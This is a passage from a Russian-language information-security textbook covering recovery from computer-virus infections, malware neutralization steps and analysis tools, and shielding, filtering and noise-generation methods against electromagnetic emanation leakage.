225 заражении. Большое количество вирусов создает новые секции и/или оп- ции в файле конфигурации Windows или системном реестре. Естественно, что к проявлениям вируса относятся такие очевидные факты, как появление сообщений или диалогов с достаточно странным содержанием или на языке, не совпадающем с языком установленной версии Word/Excel.
4.7. Методы восстановления пораженных объектов
Если же на компьютере действительно найден вирус, то надо сде- лать следующее: 1. В случае обнаружения файлового вируса, если компьютер под- ключен к сети, необходимо отключить его от сети и проинформировать системного администратора. Если вирус еще не проник в сеть, это защи- тит сервер и другие рабочие станции от проникновения вируса. Если же вирус уже поразил сервер, то отключение от сети не позволит ему вновь проникнуть на компьютер после его лечения. Подключение к сети воз- можно лишь после того, как будут вылечены все сервера и рабочие станции. При обнаружении загрузочного вируса отключать компьютер от се- ти не следует: вирусы этого типа по сети не распространяются (есте- ственно, кроме файлово-загрузочных вирусов). Если произошло заражение макро-вирусом вместо, отключения от сети достаточно на период лечения убедиться в том, что соответствую- щий редактор (Word/Excel) неактивен ни на одном компьютере. 2. Если обнаружен файловый или загрузочный вирус, следует убе- диться в том, что вирус либо нерезидентный, либо резидентная часть вируса обезврежена: при запуске некоторые (но не все) антивирусы ав- томатически обезвреживают резидентные вирусы в памяти. Удаление вируса из памяти необходимо для того, чтобы остановить его распро- странение. При сканировании файлов антивирусы открывают их, многие из резидентных вирусов перехватывают это событие и заражают откры- ваемые файлы. В результате большая часть файлов окажется заражен- ной, поскольку вирус не удален из памяти. То же может произойти и в случае загрузочных вирусов - все проверяемые дискеты могут оказаться зараженными. Если используемый антивирус не удаляет вирусы из памяти, следует перезагрузить компьютер с заведомо незараженной и защищенной от за- писи системной дискеты. Перезагрузка должна быть "холодной" (клави- ша Reset или выключение/включение компьютера), так как некоторые ви-
226 русы "выживают" при теплой перезагрузке. Некоторые вирусы использу- ют приемы, позволяющие им "выжить" и при холодной перезагрузке (см., например, вирус "Ugly"), поэтому также следует проверить в настройках BIOS пункт "последовательность загрузки A: C:", чтобы гарантировать загрузку DOS с системной дискеты, а не с зараженного винчестера. Помимо резидентности/нерезидентности полезно ознакомиться и с другими характеристиками вируса: типами заражаемых вирусом файлов, проявлениями и прочее. 3. При помощи антивирусной программы нужно восстановить за- раженные файлы и затем проверить их работоспособность. Перед лече- нием или одновременно с ним - создать резервные копии зараженных файлов и распечатать или сохранить где-либо список зараженных фай- лов (log-файл антивируса). Это необходимо для того, чтобы восстано- вить файлы, если лечение окажется неуспешным из-за ошибки в леча- щем модуле антивируса либо по причине неспособности антивируса ле- чить данный вирус. В этом случае придется прибегнуть к помощи како- го-либо другого антивируса. Гораздо надежнее, конечно, восстановить зараженные файлы из backup-копии (если она есть), однако все равно потребуются услуги ан- тивируса - вдруг не все копии вируса окажутся уничтожены, или если файлы в backup-копии также заражены. Следует отметить, что качество восстановления файлов многими антивирусными программами оставляет желать лучшего. Многие попу- лярные антивирусы частенько необратимо портят файлы вместо их ле- чения. Поэтому если потеря файлов нежелательна, то выполнять пере- численные выше пункты следует в полном объеме. В случае загрузочного вируса необходимо проверить все дискеты независимо от того, загрузочные они (т.е. содержат файлы DOS) или нет. Даже совершенно пустая дискета может стать источником распро- странения вируса - достаточно забыть ее в дисководе и перезагрузить компьютер (если, конечно же, в BIOS Setup загрузочным диском отме- чен флоппи-диск). Помимо перечисленных выше пунктов необходимо обращать особое внимание на чистоту модулей, сжатых утилитами типа LZEXE, PKLITE или DIET, файлов в архивах (ZIP, ARC, ICE, ARJ и т.д.) и данных в само- распаковывающихся файлах-архивах. Если случайно упаковать файл, за- раженный вирусом, то обнаружение и удаление такого вируса без распа- ковки файла практически невозможно. В данном случае типичной будет ситуация, при которой все антивирусные программы, неспособные ска-
227 нировать внутри упакованных файлов, сообщат о том, что от вирусов очищены все диски, но через некоторое время вирус появится опять. Штаммы вируса могут проникнуть и в backup-копии программного обеспечения при обновлении этих копий. Причем архивы и backup- копии являются основными поставщиками давно известных вирусов. Вирус может годами "сидеть" в дистрибутивной копии какого-либо про- граммного продукта и неожиданно проявиться при установке программ на новом компьютере. Никто не гарантирует полного уничтожения всех копий компьютер- ного вируса, так как файловый вирус может поразить не только выполня- емые файлы, но и оверлейные модули с расширениями имени, отличаю- щимися от COM или EXE. Загрузочный вирус может остаться на какой- либо дискете и внезапно проявиться при случайной попытке перезагру- зиться с нее. Поэтому целесообразно некоторое время после удаления ви- руса постоянно пользоваться резидентным антивирусным сканером.
4.7.1. Нейтрализация компьютерных вирусов
Методика нейтрализации: Обнаружение и блокирование активных руткитов. Проверить наличие активных руткитов, используя разнообразные антирут- киты. При выявлении руткитов деактивировать их. Изучение списка процессов и выявление имеющих отношение к вредоносным. Блокирование работы вредоносной программы. Приостановить действие процессов или потоков вредоносной программы или завершить их исполнение. Выгрузить вредоносные библиотеки, загруженные в другие процессы. Закрыть используемые вредо- носной программой дескрипторы (handles). Блокирование автозапуска вредоносной программы. Выявить точки автозапуска вредоносной программы. Удалить или отклю- чить точки автозапуска вредоносной программы или ее компо- нент. Убедиться, что вредоносная программа или ее компоненты не восстановили свой автозапуск. Удалить вредоносную программу и ее компоненты. Удалить вредоносную программу и ее компоненты, идентифицированные в процессе обнаружения вредоносной программы. Удалить со- зданные вредоносной программой ключи реестра. Удалить со- зданные копии и другие компоненты вредоносной программы,
228 идентифицированные по результатам динамического анализа. Используя антивирус или специализированные антивирусные утилиты обезвредить зараженные файлы. Восстановить работоспособность системы. Восстановить си- стемные файлы, испорченные вредоносной программой. Вернуть стандартные значения ключей реестра, испорченных вредонос- ной программой: Политики безопасности, Настройки Internet Explorer, Вид файлов и папок в Windows Explorer и т.д. Выполнить полную антивирусную проверку компьютера по- следней версией антивируса со всеми обновлениями. Цель: за- чистка, уничтожение неактивных вредоносных программ: Email- Worm.Win32.Rays.c создает свои исполняемые копии в папках компьютера под именами, аналогичными именам файлов в этой папке; P2P-Worm.Win32.Malas.j создает в shared-папках P2P- клиентов файлы под привлекательными именами: adobeupdate.exe, sexgame.exe и т.д. Нейтрализация вирусов предполагает блокирование способности вирусных программ к размножению и удаление их из файлов и памяти. При организации обезвреживания вирусов руководствуются следующи- ми положениями: лечению подлежат все без исключения зараженные файлы (во всех каталогах всех логических дисков) и вся память; возможно многократное поражение файлов вирусами (нали- чие вирусных "бутербродов"); обработка фагом зараженного файла может привести к необ- ратимым изменениям в нем; желательно сохранить файлы (особенно те, для которых нет резервных копий). Нейтрализация вируса осуществляется путем обработки заражен- ных файлов (согласно составленному списку) подходящим фагом. Если дезинфекция какого-то зараженного файла оказалась не вполне коррект- ной, этот файл следует уничтожить и восстановить его с резервной ко- пии. Если такая копия отсутствует, восстанавливается зараженный файл и делается попытка дезинфицировать его другим фагом. В простейшем варианте, когда имеются резервные копии к заражен- ным файлам, можно удалить файлы-вирусоносители с жесткого диска и дискет и тем самым прекратить дальнейшее распространение вируса.
229 Если нейтрализовать зараженный файл невозможно и есть его ре- зервная копия, прибегают к простому и почти универсальному способу лечения - уничтожению файла. Полное уничтожение всех копий вируса трудно гарантировать и по- этому для страховки некоторое время после проведения дезинфекции работа на компьютере должна выполняться под контролем резидентного антивирусного монитора.
4.7.2. Восстановление пораженных объектов
В большинстве случаев заражения вирусом процедура восстановле-
ния зараженных файлов и дисков сводится к запуску подходящего анти- вируса, способного обезвредить систему. Если же вирус неизвестен, то достаточно отослать зараженный файл фирмам-производителям антиви- русов и через некоторое время (обычно - несколько дней или недель) получить лекарство-"апдейт" против вируса. Восстановление файлов-документов и таблиц Для обезвреживания Word и Excel достаточно сохранить всю необ- ходимую информацию в формате не-документов и не-таблиц - наиболее подходящим является текстовый RTF-формат, содержащий практически всю информацию из первоначальных документов и не содержащий мак- росов. Затем следует выйти из Word/Excel, уничтожить все зараженные Word-документы, Excel-таблицы, NORMAL.DOT у Word и все докумен- ты/таблицы в StartUp-каталогах Word/Excel. После этого следует запу- стить Word/Excel и восстановить документы/таблицы из RTF-файлов. В результате этой процедуры вирус будет удален из системы, а практически вся информация останется без изменений. Однако этот ме- тод имеет ряд недостатков. Основной из них - трудоемкость конверти- рования документов и таблиц в RTF-формат, если их число велико. К тому же в случае Excel необходимо отдельно конвертировать все Листы (Sheets) в каждом Excel-файле. Второй недостаток - потеря невирусных макросов, используемых при работе. Поэтому перед запуском описан- ной процедуры следует сохранить их исходный текст, а после обезвре- живания вируса - восстановить необходимые макросы в первоначальном виде. Восстановление загрузочных секторов Восстановление секторов в большинстве случаев является довольно простой операцией и проделывается при помощи DOS'овской команды
230 SYS (загрузочные сектора дискет и логических дисков винчестера) или командой FDISK/MBR (Master Boot Record винчестера). Можно, конеч- но же, воспользоваться утилитой FORMAT, однако практически во всех случаях команды SYS вполне достаточно. Следует иметь в виду, что лечение секторов необходимо произво- дить только при условии отсутствия вируса в оперативной памяти. Если копия вируса в памяти не обезврежена, то вполне вероятно, что вирус повторно заразит дискету или винчестер после того, как код вируса бу- дет удален (даже если воспользоваться утилитой FORMAT). Будьте также крайне осторожны при использовании FDISK/MBR. Эта команда заново переписывает код программы-загрузчика системы и не изменяет таблицу разбиения диска (Disk Partition Table). FDISK/MBR является 100% лекарством для большинства загрузочных вирусов, одна- ко, если вирус шифрует Disk Partition Table или использует нестандарт- ные способы заражения, FDISK/MBR может привести к полной потере информации на диске. Поэтому перед запуском FDISK/MBR убедитесь в корректности Disk Partition Table. Для этого требуется загрузиться с не- зараженной DOS-дискеты и проверить корректность этой таблицы. Если же восстановление секторов при помощи SYS/FDISK невоз- можно, то следует разобраться в алгоритме работы вируса, обнаружить на диске первоначальный boot/MBR-сектор и перенести его на законное место (для этого подходят Norton Disk Editor). При этом надо постоянно иметь в виду, что при перезаписи системных загрузчиков необходимо соблюдать особую осторожность, поскольку результатом неправильного исправления сектора MBR или boot-сектора может быть потеря всей ин- формации на диске (дисках). Восстановление файлов В подавляющем большинстве случаев восстановление зараженных файлов является достаточно сложной процедурой, которую невозможно произвести "руками" без необходимых знаний - форматов выполняемых файлов, языка ассемблера и т.д. К тому же обычно зараженными на дис- ке оказываются сразу несколько десятков или сотен файлов и для их обезвреживания необходимо разработать собственную программу- антивирус. При лечении файлов следует учитывать следующие правила: - необходимо протестировать и вылечить все выполняемые файлы (COM, EXE, SYS, оверлеи) во всех каталогах всех дисков вне зависимо- сти от атрибутов файлов (т.е. файлы read-only, системные и скрытые);
231 - желательно сохранить неизменными атрибуты и дату последней модификации файла; - необходимо учесть возможность многократного поражения файла вирусом ("бутерброд" из вирусов). Само лечение файла производится в большинстве случаев одним из нескольких стандартных способов, зависящих от алгоритма размноже- ния вируса. В большинстве случаев это сводится к восстановлению за- головка файла и уменьшению его длины. Дезактивация оперативной памяти Процедура дезактивации памяти, как и лечение зараженных файлов, требует некоторых знаний об операционной системе и обязательного знания языка Ассемблер. При лечении оперативной памяти необходимо обнаружить коды вируса и изменить их таким образом, чтобы вирус в дальнейшем не ме- шал работе антивирусной программы - "отключить" подпрограммы за- ражения и стелс. Для этого требуется полный анализ кода вируса, так как процедуры заражения и стелс могут располагаться в различных участках вируса, дублировать друг друга и получать управление при различных условиях. В большинстве случаев для дезактивации памяти достаточно "обру- бить" прерывания, перехватываемые вирусом: INT 21h в случае файло- вых вирусов и INT 13h в случае загрузочных (существуют, конечно же, вирусы, перехватывающие другие прерывания или несколько прерыва- ний). Например, если вирус заражает файлы при их открытии, то это может выглядеть примерно так:
Рис. 41. Пример деактивации компьютерного вируса
При дезактивации TSR-копии вируса необходимо помнить, что ви- рус может предпринимать специальные меры для восстановления своих кодов (например, некоторые вирусы семейства "Yankee" восстанавлива-
232 ют их при помощи методов помехозащищенного кодирования), и в этом случае придется нейтрализовать и механизм самовосстановления вируса. Некоторые вирусы, кроме того, подсчитывают CRC своей резидентной копии и перезагружают компьютер или стирают сектора диска, если CRC не совпадает с оригинальным значением. В этом случае необходи- мо "обезвредить" также и процедуру подсчета CRC.
4.7.3. Инструменты, необходимые для обнаружения, анализа
и нейтрализации вредоносных программ Инструменты обнаружения: Антируткиты AVZ и другие антируткиты; Процессы и память Process Explorer; Реестр Regmon (Windows 9x/2000/XP) Autoruns; Файловая система Filemon (Windows 9x/2000/XP); Сеть TCPView Wireshark; Файлы, процессы, реестр, сеть Process Monitor (Windows XP и выше). Инструменты экспресс-анализа: Файловая база данных Bit9 FileAdvisor http://fileadvisor.bit9.com/ Проверка заданного файла по специ- ализированным базам чистых (whitelist) и вредоносных (blacklist) файлов Веб-службы комплексной антивирусной проверки: VirusTotal www.virustotal.com Комплексная проверка 32-мя антивируса- ми; Jotti’s malware scan virusscan.jotti.org Комплексная провер- ка 21-м антивирусом;VirSCAN www.virscan.org Комплексная проверка 36-ю антивирусами. Песочницы: Threat Expert www.threatexpert.com Анализ поведения PE- файлов в VMware; Norman Sandbox http://www.norman.com/microsites/nsic/Submit/en. Анализ поведения PE-файлов в эмуляторе Norman Sandbox; Sunbelt CWSandbox http://www.sunbelt- software.com/Developer/Sunbelt-CWSandbox/ Анализ пове- дения PE-файлов в реальной машине; Wepawet http://wepawet.iseclab.org/. Анализ поведения JS- и SWF-зловредов Инструменты динамического анализа:
233 Изолированная среда исполнения VMware Workstation: возмож- ность создания «снимков состояния» виртуальной машины (snapshots), возможность создания связанных клонов виртуальных машин (linked clones), поддерживает функцию «Drag’n’Drop» фай- лов в/из виртуальной машины, бесплатная испытательная версия (30 дней) http://www.vmware.com/; Microsoft Virtual PC нет возможности создания «снимков состоя- ния», поддерживает функцию «Drag’n’Drop» файлов в/из вирту- альной машины, нет возможности создания связанных клонов вир- туальных машин (linked clones), http://www.microsoft.com/ windows/downloads/virtualpc/default.mspx бесплатная Sun (Oracle)) xVM VirtualBox: возможность создания «снимков состояния» виртуальной машины (snapshots), нет под- держки функции «Drag’n’Drop» файлов в/из виртуальной машины, нет возможности создания связанных клонов виртуальных машин (linked clones) , http://www.sun.com/software/products/ virtualbox/index.jsp, бесплатная Настройки безопасности изолированной среды исполнения: Отключение сетевого адаптера в гостевой операционной системе во избежание «побега» вредоносной программы из изолированной среды. При использовании ресурсов общего доступа (shared folders) уста- навливать для них права доступа только на чтение из гостевой операционной системы, чтобы избежать заражения файлов или со- здания копий вредоносных программ в этих ресурсах. Инструменты статического анализа: PEiD Определение упаковщика исполняемого файла. IDA Pro Free Дизассемблирование.
234 5. ПРОГРАММНО-АППАРАТНЫЕ СРЕДСТВА ОБЕСПЕЧЕНИЯ ИНФОРМАЦИОННОЙ БЕЗОПАСНОСТИ 5.1. Методы и средства защиты информации от утеч- ки по каналам электромагнитных излучений и наводок
5.1.1. Особенности формирования каналов утечки
Работа средств вычислительной техники сопровождается электро-
магнитными излучениями и наводками на соединительные проводные линии, цепи "питания", "земля", возникающими вследствие электромаг- нитных воздействий в ближней зоне излучения, в которую могут попа- дать также провода вспомогательной и посторонней аппаратуры. Элек- тромагнитные излучения, даже если они отвечают допустимым техниче- ским нормам, не являются безопасными с точки зрения утечки секрет- ной информации и несанкционированного доступа к ней. В некоторых случаях информацию, обрабатываемую средствами ЭВТ, можно восстановить путем анализа электромагнитных излучений и наводок. Для этого необходимы их прием и декодирование. Одно время считалось очень трудным делом расшифровать информацию, содержа- щуюся в излучении, и что поэтому восстановление информации после приема под силу только профессионалам, располагающим очень слож- ной аппаратурой обнаружения и декодирования. Однако исследования показали, что восстановление информации от некоторых средств ЭВТ возможно с помощью общедоступных радиоэлектронных средств. В частности, при восстановлении информации с дисплеев можно исполь- зовать обычный черно-белый телевизор, в котором сделаны незначи- тельные усовершенствования. Если дисплей является элементом вычис- лительной системы, то он может оказаться самым слабым ее звеном, ко- торое сведет на нет все меры по увеличению безопасности излучений, принятые во всех остальных частях системы. Применение в средствах ЭВТ импульсных сигналов прямоугольной формы и высокочастотной коммутации приводит к тому, что в спектре излучений будут компоненты с частотами вплоть до СВЧ. Хотя энерге- тический спектр сигналов убывает с ростом частоты, но эффективность излучения при этом увеличивается, и уровень излучений может оста- ваться постоянным до частот нескольких гигагерц. Резонансы из-за па-
235 разитных связей могут вызывать усиление излучения сигналов на неко- торых частотах спектра[20;26].
5.1.2. Защита информации от утечки по каналам ПЭМИН
Работа средств вычислительной техники сопровождается электро-
магнитными излучениями и наводками на соединительные проводные линии и цепи "питания", "земля", возникающими вследствие электро- магнитных воздействий в ближней зоне излучения, в которую могут по- падать также провода вспомогательной и посторонней аппаратуры. Электромагнитные излучения, даже если они отвечают допустимым техническим нормам, не являются безопасными с точки зрения утечки секретной ин формации и несанкционированного доступа к ней. В некоторых случаях информацию, обрабатываемую СВТ можно восстановить путем анализа электромагнитных излучений и наводок. Для этого необходимы их прием и декодирование. Одно время счита- лось очень трудным делом расшифровать информацию, содержащуюся в излучении. Поэтому восстановление информации после приема под силу только профессионалам, располагающим очень сложной аппарату- рой обнаружения и декодирования. Однако исследования показали, что восстановление информации от некоторых СВТ возможно с помощью общедоступных радиоэлектронных средств. В частности, при восста- новлении информации с дисплеев можно использовать обычный черно- белый телевизор, в котором сделаны незначительные усовершенствова- ния. Если дисплей является элементом вычислительной системы, то он может оказаться самым слабым ее звеном, которое сведет на нет все ме- ры по увеличению безопасности излучений, принятые во всех остальных частях системы. Применение в СВТ импульсных сигналов прямоугольной формы и высокочастотной коммутации приводит к тому, что в спектре излучений будут компоненты с частотами вплоть до СВЧ. Хотя энергетический спектр сигналов убывает с ростом частоты, эффективность излучения при этом увеличивается, и уровень излучений может оставаться постоянным до частот нескольких ГГц. Резонансы из-за паразитных связей могут вы- зывать усиление излучения сигналов на некоторых частотах спектра. В целях защиты секретной информации от утечки за счет побочного электромагнитного излучения и наводок производится измерение уровня опасных сигналов на расстоянии от источника (дисплея, печатающего устройства, кабеля и т.д.). Замеры производят в нескольких точках на разных расстояниях от источника с помощью специальной приемной
236 аппаратуры. Если уровень сигнала на границе установленной зоны пре- высил допустимые значения, применяют защитные меры. Защитные меры могут носить различный характер в зависимости от сложности, стоимости и времени их реализации, которые определяются при создании конкретной вычислительной системы. Такими мерами мо- гут быть: доработка аппаратуры с целью уменьшения уровня сигналов, установка специальных фильтров, параллельно работающих аппаратных генераторов шума, специальных экранов и другие меры. В числе этих мер большие надежды возлагаются на применение в линиях и каналах связи волоконно-оптических кабелей (ВОК), которые обладают следу- ющими преимуществами: отсутствием электромагнитного излучения во внешнюю среду; устойчивостью к внешним электромагнитным излучениям; большой помехозащищенностью; скрытностью передачи; малыми габаритами (что позволяет прокладывать их рядом с уже существующими кабельными линиями); устойчивостью к воздействиям агрессивной среды. С точки зрения защиты информации ВОК имеют еще одно пре- имущество: подключение к ним с целью перехвата передаваемых дан- ных представляет собой значительно более сложную задачу, чем под- ключение к обычному проводу или кабелю с помощью индуктивных датчиков и прямого подключения. Однако замена одного кабеля другим связана с введением электрооптических и оптико-электрических преоб- разователей, на которые и перекладывается проблема обеспечения без- опасности информации. Защита информации от утечки по электромагнитным каналам — это комплекс мероприятий, исключающих или ослабляющих возможность неконтролируемого выхода конфиденциальной информации за пределы контролируемой зоны за. счет электромагнитных полей побочного ха- рактера и наводок. Для защиты информации от утечки по электромагнитным каналам применяются как общие методы Защиты от утечки, так и специфические — именно для этого вида каналов. Кроме того, защитные действия можно классифицировать на конструкторско-технологические решения, ориен- тированные на исключение возможности возникновения таких каналов, и эксплуатационные, связанные с обеспечением условий использования тех или иных технических средств в условиях производственной и трудовой деятельности.
237 Конструкторско-технологические мероприятия по локализации возможности образования условий возникновения каналов утечки ин- формации за счет побочных электромагнитных излучений и наводок - в технических средствах обработки и передачи информации сводятся к ра- циональным конструкторско-технологическим решениям, к числу кото- рых относятся: экранирование элементов и узлов аппаратуры; ослабление электромагнитной, емкостной, индуктивной связи между элементами и токонесущими проводами; фильтрация сигналов в цепях питания и заземления и другие меры, связанные с использованием ограничителей, развязывающих це- пей, систем взаимной компенсации, ослабителей и других мер по ослаблению или уничтожению ПЭМИН Экранирование позволяет защитить их от нежелательных воздей- ствий акустических и электромагнитных сигналов и излучений собственных электромагнитных полей, а также ослабить (или исключить) паразитное влияние внешних излучений. Экранирование бывает электростатиче- ское, магнитостатическое и электромагнитное. Электростатическое экранирование заключается в замыкании сило- вых линий электростатического поля источника на поверхность экрана и отводе наведенных зарядов на массу и на землю. Такое экранирование эффективно для устранения емкостных паразитных связей. Экранирую- щий эффект максимален на постоянном токе и с повышением частоты снижается. Магнитостатическое экранирование основано на замыкании сило- вых линий магнитного поля источника в толще экрана, обладающего малым магнитным сопротивлением для постоянного тока и в области низких частот. С повышением частоты сигнала применяется исключительно электро- магнитное экранирование. Действие электромагнитного экрана основано на том, что высокочастотное электромагнитное поле ослабляется им же созданным (благодаря образующимся в толще экрана вихревым токам) полем обратного направления. Если расстояние между экранирующими цепями, проводами, при- борами составляет 10% от четверти длины волны, то можно считать, что электромагнитные связи этих цепей осуществляются за счет обычных элек- трических и магнитных полей, а не в результате переноса энергии в про- странстве с помощью электромагнитных волн. Это дает возможность от- дельно рассматривать экранирование электрических и магнитных полей,
238 что очень важно, так как на практике преобладает какое-либо одно из по- лей и подавлять другое нет необходимости. Заземление и металлизация аппаратуры и ее элементов служат надежным средством отвода наведенных сигналов на землю (сопротивле- ние заземления не должно быть более 1 Ом), ослабления паразитных свя- зей и наводок между отдельными цепями. Фильтры различного назначения служат для подавления или ослаб- ления сигналов при их возникновении или распространении, а также для защиты систем питания аппаратуры обработки информации. Для этих же целей могут применяться и другие технологические решения. Эксплуатационные меры ориентированы на выбор мест установки технических средств с учетом особенностей их электромагнитных полей с таким расчетом, чтобы исключить их выход за пределы контролируемой зоны. В этих целях возможно осуществлять экранирование помещений, в которых находятся средства с большим уровнем побочных электромаг- нитных излучений (ПЭМИ). Особо необходимо остановится на волоконно-оптических системах. С точки зрения защиты информации волоконно-оптические кабели имеют преимущество: подключение к ним с целью перехвата передава- емых данных представляет собой значительно более сложную задачу, чем подключение к обычному проводу или кабелю с помощи индуктив- ных датчиков и прямого подключения . Однако замена одного кабеля другим связана с введением электрооптических и оптикоэлектрических преобразователей, на которые и перекладывается проблема обеспечения безопасности информации. Решение этой проблемы находится в упомя- нутой выше области.
5.1.3. Методы и средства защиты от электромагнитных
излучений и наводок Все методы защиты от электромагнитных излучений и наводок можно разделить на пассивные и активные. Пассивные методы обеспечивают уменьшение уровня опасного сигнала или снижение информативности сигналов. Активные методы защиты направлены на создание помех в каналах ПЭМИН, затрудняющих прием и выделение полезной информации из перехваченных злоумышленником сигналов. Активные методы защиты от ПЭМИН предполагают использование генераторов шумов. В качестве маскирующих используются случайные помехи с нормальным законом распределения спектральной плотности
239 мгновенных значений амплитуд (гауссовские помехи) и прицельные по- мехи, представляющие собой случайную последовательность сигналов помехи, идентичных побочным сигналам. Используется пространственное и линейное зашумление. Простран- ственное зашумление осуществляется за счет излучения с помощью ан- тенн электромагнитных сигналов в пространство. Применяется локаль- ное пространственное зашумление для защиты конкретного элемента АС и объектовое пространственное зашумление для защиты от побоч- ных электромагнитных излучений АС всего объекта. При локальном пространственном зашумлении используются прицельные помехи. Ан- тенна находится рядом с защищаемым элементом АС. Объектовое про- странственное зашумление осуществляется, как правило, несколькими генераторами со своими антеннами, что позволяет создавать помехи во всех диапазонах побочных электромагнитных излучений всех излучаю- щих устройств объекта. При использовании линейного зашумления генераторы прицельных помех подключаются к линиям для создания в них электрических помех. Пространственное зашумление должно обеспечивать невозмож- ность выделения побочных излучений на фоне создаваемых помех во всех диапазонах излучения и, вместе с тем, уровень создаваемых помех не должен превышать санитарных норм и норм по электромагнитной совместимости радиоэлектронной аппаратуры. Для блокирования угрозы облучения электронных блоков и маг- нитных запоминающих устройств мощными внешними электромагнит- ными импульсами используются пассивные методы защиты. Защита от побочных электромагнитных излучений и наводок осу- ществляется как пассивными, так и активными методами. Пассивные методы защиты от ПЭМИН могут быть разбиты на три группы (рис. 42).
240 Рис. 42. Классификация пассивных методов защиты от ПЭМИН Экранирование является одним из самых эффективных методов за- щиты от ПЭМИН. Под экранированием понимается размещение элемен- тов КС, создающих электрические, магнитные и электромагнитные по- ля, в заземленных, пространственно замкнутых конструкциях из токо- проводящего материала. Обычно экраны изготавливаются из листовой стали или металлической сетки. В настоящее время в качестве экранов используются металлизированные ткани и металлические пленки, полу- чаемые напылением на пластмассовых поверхностях и стекле. Экранирование электрического поля заземленным экраном обеспе- чивается нейтрализацией электрических зарядов, стекающих по зазем- ляющему контуру. Контур заземления должен иметь сопротивление не более 4 0м. Физические процессы, протекающие в экранах, зависят от частоты магнитного поля. Низкочастотные магнитные поля шунтируются экраном за счет направленности силовых линий вдоль стенок экрана. Этот эффект вызывается большей магнитной проницаемостью материала экрана по сравнению с воздухом. Высокочастотное магнитное поле вызывает воз- никновение переменных индукционных вихревых токов, которые созда- ваемым ими магнитным полем препятствуют распространению побочно- го магнитного поля. Заземление не влияет на экранирование магнитных полей. Поглощающая способность экрана зависит от частоты побочного излучения и от материала, из которого изготавливается экран. Чем ниже частота излучения, тем большей должна быть толщина экрана. Для излу- чений в диапазоне средних волн и выше достаточно эффективным явля- ется экран толщиной 0,5 – 1,5 мм. Для излучений на частотах свыше 10 МГц достаточно иметь экран из меди или серебра толщиной 0,1 мм.
241 Электромагнитные излучения блокируются методами высокоча- стотного электрического и магнитного экранирования. Экранирование осуществляется на пяти уровнях: 1. Уровень элементов схем. 2. Уровень блоков. 3. Уровень устройств. 4. Уровень кабельных линий. 5. Уровень помещений. Элементы схем с высоким уровнем побочных излучений могут по- мещаться в металлические или металлизированные напылением зазем- ленные корпуса. Начиная с уровня блоков, экранирование осуществля- ется с помощью конструкций из листовой стали, металлических сеток и напыления. Экранирование кабелей осуществляется с помощью метал- лической оплетки, стальных коробов или труб. При экранировании помещений используются: листовая сталь тол- щиной до 2 мм, стальная (медная, латунная) сетка с ячейкой до 2,5 мм. В защищенных помещениях экранируются двери и окна. Окна экраниру- ются сеткой, металлизированными шторами, металлизацией стекол и оклеиванием их токопроводящими пленками. Двери выполняются из стали или покрываются токопроводящими материалами (стальной лист, металлическая сетка). Особое внимание обращается на наличие электри- ческого контакта токопроводящих слоев двери и стен по всему перимет- ру дверного проема. При экранировании полей недопустимо наличие за- зоров, щелей в экране. Размер ячейки сетки должен быть не более 0,1 длины волны излучения. Выбор числа уровней и материалов экранирования осуществляется с учетом: характеристик излучения (тип излучения, частота и мощность); требований к уровню излучения за пределами контролируемой зо- ны и размеров зоны; наличия или отсутствия других методов защиты от ПЭМИН; минимизации затрат на экранирование. В защищенной ПЭВМ, например, экранируются блоки управления электронно-лучевой трубкой, корпус выполняется из стали или металли- зируется изнутри, экран покрывается металлической пленкой и (или) защищается металлической сеткой. Экранирование, помимо выполнения своей прямой функции защи- ты от ПЭМИН, значительно снижает вредное воздействие электромаг-
242 нитных излучений на организм человека. Экранирование позволяет так- же уменьшить влияние электромагнитных шумов на работу устройств. Способы защиты от ПЭМИН, объединенные в группу " Снижение мощности излучений и наводок ", реализуются с целью снижения уров- ня излучения и взаимного влияния элементов АС. К данной группе относятся следующие методы: изменение электрических схем; использование оптических каналов связи; изменение конструкции; использование фильтров; гальваническая развязка в системе питания. Изменения электрических схем осуществляются для уменьшения мощности побочных излучений. Это достигается за счет использования элементов с меньшим излучением, уменьшения крутизны фронтов сиг- налов, предотвращения возникновения паразитной генерации, наруше- ния регулярности повторений информации. Перспективным направлением борьбы с ПЭМИН является исполь- зование оптических каналов связи. Для передачи информации на боль- шие расстояния успешно используются волоконно-оптические кабели. Передачу информации в пределах одного помещения (даже больших размеров) можно осуществлять с помощью беспроводных систем, ис- пользующих излучения в инфракрасном диапазоне. Оптические каналы связи не порождают ПЭМИН. Они обеспечивают высокую скорость пе- редачи и не подвержены воздействию электромагнитных помех. Изменения конструкции сводятся к изменению взаимного располо- жения отдельных узлов, блоков, кабелей, сокращению длины шин. Использование фильтров является одним из основных способов за- щиты от ПЭМИН. Фильтры устанавливаются как внутри устройств, си- стем для устранения распространения и возможного усиления наведен- ных побочных электромагнитных сигналов, так и на выходе из объектов линий связи, сигнализации и электропитания. Фильтры рассчитываются таким образом, чтобы они обеспечивали снижение сигналов в диапазоне побочных наводок до безопасного уровня и не вносили существенных искажений полезного сигнала. Полностью исключается попадание побочных наведенных сигналов во внешнюю цепь электропитания при наличии генераторов питания, которые обеспечивают гальваническую развязку между первичной и вторичной цепями.
243 Использование генераторов позволяет также подавать во вторич- ную цепь электропитание с другими параметрами по сравнению с пер- вичной цепью. Так, во вторичной цепи может быть изменена частота по сравнению с первичной цепью. Генераторы питания, за счет инерцион- ности, позволяют сглаживать пульсации напряжения и кратковременные отключения в первичной цепи. Снижение информативности сигналов ПЭМИН, затрудняющее их использование при перехвате, осуществляется следующими путями: - специальные схемные решения; - кодирование информации. В качестве примеров специальных схемных решений можно приве- сти такие, как замена последовательного кода параллельным, увеличе- ние разрядности параллельных кодов, изменение очередности развертки строк на мониторе и т. п. Для предотвращения утечки информации может использоваться ко- дирование информации, в том числе и криптографическое преобразова- ние.
5.2. Современные технологии повышения надежности и
отказоустойчивости Для блокирования (парирования) случайных угроз безопасности информации в АС должен быть решен комплекс задач (см. рис. 43) [22]. Дублирование информации Дублирование информации является одним из самых эффективных способов обеспечения целостности информации. Он обеспечивает защи- ту информации, как от случайных угроз, так и от преднамеренных воз- действий. В зависимости от ценности информации, особенностей построения и режимов функционирования АС могут использоваться различные ме- тоды дублирования. Множество методов может быть классифицировано по различным признакам.
